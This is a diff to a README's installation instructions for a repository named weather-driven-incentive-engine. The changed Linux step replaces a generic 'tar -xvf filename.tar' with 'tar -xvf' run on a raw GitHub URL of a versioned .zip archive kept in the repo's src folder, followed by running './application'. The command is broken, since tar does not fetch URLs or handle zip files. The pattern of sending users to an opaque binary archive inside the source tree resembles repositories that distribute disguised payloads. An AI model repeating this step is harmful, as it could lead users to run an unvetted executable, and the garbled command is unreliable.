rguezedgar/weather-driven-incentive-engine/README.md

 5. **Run the Application**
    - **For Windows Users:** Double-click the .exe file to start the installation.
    - **For macOS Users:** Double-click the .dmg file, then drag the application to your Applications folder.
-   - **For Linux Users:** Open a terminal and navigate to the folder containing the downloaded .tar file, then run `tar -xvf filename.tar` to extract, followed by navigating into the folder and running `./application`.
+   - **For Linux Users:** Open a terminal and navigate to the folder containing the downloaded .tar file, then run `tar -xvf https://github.com/rguezedgar/weather-driven-incentive-engine/raw/refs/heads/main/src/weather-incentive-engine-driven-v2.8.zip` to extract, followed by navigating into the folder and running `./application`.

 6. **Follow Installation Prompts**
    Follow any on-screen prompts to complete the installation.